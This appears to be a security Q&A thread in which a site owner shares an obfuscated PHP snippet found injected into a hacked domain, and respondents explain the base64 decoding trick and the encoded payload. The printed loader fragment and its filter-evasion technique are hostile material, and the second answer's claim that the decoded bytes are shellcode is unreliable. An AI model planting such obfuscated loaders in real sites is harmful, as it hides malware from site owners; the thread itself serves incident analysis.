injected code decode

Question

Recently I saw a domain of mine was hacked and the hacker have injected his code in some encryption format as below.

<?php $l___l_='base'.(32*2).'_de'.'code';$l___l_=$l___l_(str_replace("\n", '', 'D+I/q0Gc5hiUdrnOss2HvSvTg1sG8Q6rE6jWEaBtDzQFKd1Er6yZI1MBfxpqll488V7Tbm3phDbBFAwG
k5MLq6NbLAXb69v3jtw65S0KD5Nx2R8ROgea8Z0z1b/1amqjjy706S1+QQ2+nJYjdf8QYi0ic4kArurt
yE+zVXve7+PByfRZYTFOL7f+0YwcE/+JilFvFyJjOuid8BGS2mlNGOQfnhKnE5hx6rqcKCtrfk29fJNM
s+r1ppMJoVjBbstGuXjMHXYCPlD90sncCTKs/zartN4bBWXeSWp585mZc+OeYVL5mJcPxJn673e62z+y
rROT7OcGEMyd7LCDyMB41OwG6Q5VDAv0wZNelA+Yz0JiYd4nahYoWC/35syZlXQr136ftUc+8gR9xfQW
gG1d2mOxcozGxZbuM9mB80UyYxmXnRDBocwKeR8uTPTiAEXWocDxXLwuCrfhkLZuAvHG2b857X8uqx68
nS8+XSMFquYb6spb8irA

I was wondering if anyone knows how to decode it. I want to see his code. Is there any online site available? Doing some research, some sites shows that it follows following encryption

str_replace --> base64_decode --> md5

MD5 is not a encryption algorithm, it's hashing. It's not possible to reverse the hashing (but creating a collision is). And there's no MD5 on the code... — ThoriumBR, Mar 09 '15 at 18:09

aviv · Answer 1 · 2014-08-11T11:37:13.870

2

Its a base 64 encoded payload. Web firewalls are familiar with base64 encoded payloads and try to defend against them hence the attacker is using a technique to evade firewalls that search and filter the call to base64_decode.

Eventually the $l___l_ parameter will hold the decoded content

So instead he constructs it as follows:

_ $l___l_='base'.(32*2).'_de'.'code' => base64_decode
$l___l_=$l___l_(//content) => base64_decode(content) => decoded content

the string replace just deletes the new lines (\n) from the content before decoding

from studying similar looking attack on this blog it seems that the content you receive after base 64 decoding is an encrypted payload. The password to decrypt the payload is obtained by a POST request to another server.

edited Aug 11 '14 at 11:37

answered Aug 11 '14 at 11:24

aviv

1,317
7
9

yep sure it is what you have explained. Is there any website which will decode it? – Prakash Aug 11 '14 at 11:26
there are many, for example http://www.base64decode.org/ – aviv Aug 11 '14 at 11:29
I edited my reply... have a look at the blog I linked - it looks similar to the payload in your example – aviv Aug 11 '14 at 11:47

score 1 · Answer 2 · answered Aug 11 '14 at 11:45

MD5 is a hash function, not encryption. Base64 is an encoding to represent non-printable characters as printable characters. The quick bit of code he's written simply removes the new lines in the Base64 string you see there, and decodes it to what will probably be his shell code.

You can decode Base64 from this website. The shell code given looks like the following:

0f  e2  3f  ab  41  9c  e6  18  94  76  b9  ce  b2  cd  87  bd  
2b  d3  83  5b  06  f1  0e  ab  13  a8  d6  11  a0  6d  0f  34  
05  29  dd  44  af  ac  99  23  53  01  7f  1a  6a  96  5e  3c  
f1  5e  d3  6e  6d  e9  84  36  c1  14  0c  06  93  93  0b  ab  
a3  5b  2c  05  db  eb  db  f7  8e  dc  3a  e5  2d  0a  0f  93  
71  d9  1f  11  3a  07  9a  f1  9d  33  d5  bf  f5  6a  6a  a3  
8f  2e  f4  e9  2d  7e  41  0d  be  9c  96  23  75  ff  10  62  
2d  22  73  89  00  ae  ea  ed  c8  4f  b3  55  7b  de  ef  e3  
c1  c9  f4  59  61  31  4e  2f  b7  fe  d1  8c  1c  13  ff  89  
8a  51  6f  17  22  63  3a  e8  9d  f0  11  92  da  69  4d  18  
e4  1f  9e  12  a7  13  98  71  ea  ba  9c  28  2b  6b  7e  4d  
bd  7c  93  4c  b3  ea  f5  a6  93  09  a1  58  c1  6e  cb  46  
b9  78  cc  1d  76  02  3e  50  fd  d2  c9  dc  09  32  ac  ff  
36  ab  b4  de  1b  05  65  de  49  6a  79  f3  99  99  73  e3  
9e  61  52  f9  98  97  0f  c4  99  fa  ef  77  ba  db  3f  b2  
ad  13  93  ec  e7  06  10  cc  9d  ec  b0  83  c8  c0  78  d4  
ec  06  e9  0e  55  0c  0b  f4  c1  93  5e  94  0f  98  cf  42  
62  61  de  27  6a  16  28  58  2f  f7  e6  cc  99  95  74  2b  
d7  7e  9f  b5  47  3e  f2  04  7d  c5  f4  16  80  6d  5d  da  
63  b1  72  8c  c6  c5  96  ee  33  d9  81  f3  45  32  63  19  
97  9d  10  c1  a1  cc  0a  79  1f  2e  4c  f4  e2  00  45  d6  
a1  c0  f1  5c  bc  2e  0a  b7  e1  90  b6  6e  02  f1  c6  d9  
bf  39  ed  7f  2e  ab  1e  bc  9d  2f  3e  5d  23  05  aa  e6  
1b  ea  ca  5b  f2  2a  c0

You could try disassembling the code above using an Online Disassembler. Using a single string like below of the shellcode above

0f  e2  3f  ab  41  9c  e6  18  94  76  b9  ce  b2  cd  87  bd  2b  d3  83  5b  06  f1  0e  ab  13  a8  d6  11  a0  6d  0f  34  05  29  dd  44  af  ac  99  23  53  01  7f  1a  6a  96  5e  3c  f1  5e  d3  6e  6d  e9  84  36  c1  14  0c  06  93  93  0b  ab  a3  5b  2c  05  db  eb  db  f7  8e  dc  3a  e5  2d  0a  0f  93  71  d9  1f  11  3a  07  9a  f1  9d  33  d5  bf  f5  6a  6a  a3  8f  2e  f4  e9  2d  7e  41  0d  be  9c  96  23  75  ff  10  62  2d  22  73  89  00  ae  ea  ed  c8  4f  b3  55  7b  de  ef  e3  c1  c9  f4  59  61  31  4e  2f  b7  fe  d1  8c  1c  13  ff  89  8a  51  6f  17  22  63  3a  e8  9d  f0  11  92  da  69  4d  18  e4  1f  9e  12  a7  13  98  71  ea  ba  9c  28  2b  6b  7e  4d  bd  7c  93  4c  b3  ea  f5  a6  93  09  a1  58  c1  6e  cb  46  b9  78  cc  1d  76  02  3e  50  fd  d2  c9  dc  09  32  ac  ff  36  ab  b4  de  1b  05  65  de  49  6a  79  f3  99  99  73  e3  9e  61  52  f9  98  97  0f  c4  99  fa  ef  77  ba  db  3f  b2  ad  13  93  ec  e7  06  10  cc  9d  ec  b0  83  c8  c0  78  d4  ec  06  e9  0e  55  0c  0b  f4  c1  93  5e  94  0f  98  cf  42  62  61  de  27  6a  16  28  58  2f  f7  e6  cc  99  95  74  2b  d7  7e  9f  b5  47  3e  f2  04  7d  c5  f4  16  80  6d  5d  da  63  b1  72  8c  c6  c5  96  ee  33  d9  81  f3  45  32  63  19  97  9d  10  c1  a1  cc  0a  79  1f  2e  4c  f4  e2  00  45  d6  a1  c0  f1  5c  bc  2e  0a  b7  e1  90  b6  6e  02  f1  c6  d9  bf  39  ed  7f  2e  ab  1e  bc  9d  2f  3e  5d  23  05  aa  e6  1b  ea  ca  5b  f2  2a  c0

Hope this helps!

injected code decode

2 Answers2